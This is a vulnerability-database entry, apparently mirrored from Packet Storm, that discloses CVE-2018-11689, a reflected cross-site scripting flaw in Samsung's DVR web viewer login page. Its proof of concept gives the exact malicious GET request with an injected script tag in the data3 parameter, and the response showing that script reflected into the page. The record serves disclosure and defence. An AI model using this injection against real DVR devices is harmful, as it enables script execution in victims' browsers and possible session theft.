ID

VAR-E-201806-0158


CVE

cve_id:CVE-2018-11689

Trust: 0.5

sources: PACKETSTORM: 148183

TITLE

Samsung Web Viewer For Samsung DVR Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 148183

DESCRIPTION

Samsung Web Viewer for Samsung DVR suffers from a cross site scripting vulnerability.

Trust: 0.5

sources: PACKETSTORM: 148183

AFFECTED PRODUCTS

vendor:samsung model:web viewer for samsung dvr scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 148183

EXPLOIT

I. VULNERABILITY
-------------------------
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)

II. CVE REFERENCE
-------------------------
CVE-2018-11689

III. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689

IV. CREDIT
-------------------------
Yavuz Atlas - Biznet Bilisim
http://www.biznet.com.tr/biznet-guvenlik-duyurulari

V. DESCRIPTION
-------------------------
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is
vulnerable to cross-site scripting. The vulnerability allows remote
attackers to inject arbitrary web script or HTML.

VI. PROOF OF CONCEPT
-------------------------
Request:
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> HTTP/1.1
Host: 10.10.10.10

Response:
HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true
Content-type: text/html
Connection: close
Date: Wed, 23 May 2018 11:14:09 GMT
Server: lighttpd/1.4.35
Content-Length: 10797

...
function setcookie(){
var val_rand = Math.random();
if(is_close_user_session == true)
document.login_page_submit.close_user_session.value = 1;
else
document.login_page_submit.close_user_session.value = 0;
document.login_page_submit.data1.value =
data_parser(document.login_page.data1.value);
document.login_page_submit.data2.value =
do_encrypt(document.login_page.data2.value);
document.login_page_submit.data3.value = </script><script>alert(1)</script>;
document.login_page_submit.data4.value = val_rand;
document.login_page_submit.submit();
}
...

Trust: 0.5

sources: PACKETSTORM: 148183

EXPLOIT HASH

LOCAL

SOURCE

md5: 4c1965dce41d570dded8761c42edd7e7
sha-1: 227c5b816b8e2fa48b0004b82d4a831cf27a8db2
sha-256: 28ee384b12e160b3c5e4f50d45108e9755237ea04aa1c17e88fad851fbac65a8

Trust: 0.5

sources: PACKETSTORM: 148183

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 148183

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 148183

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 148183

CREDITS

Yavuz Atlas

Trust: 0.5

sources: PACKETSTORM: 148183

EXTERNAL IDS

db:NVD id:CVE-2018-11689

Trust: 0.5

db:PACKETSTORM id:148183

Trust: 0.5

sources: PACKETSTORM: 148183

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-11689

Trust: 0.5

sources: PACKETSTORM: 148183

SOURCES

db:PACKETSTORM id:148183

LAST UPDATE DATE

2022-07-27T09:18:18.378000+00:00


SOURCES RELEASE DATE

db:PACKETSTORM id:148183 date:2018-06-13T22:22:22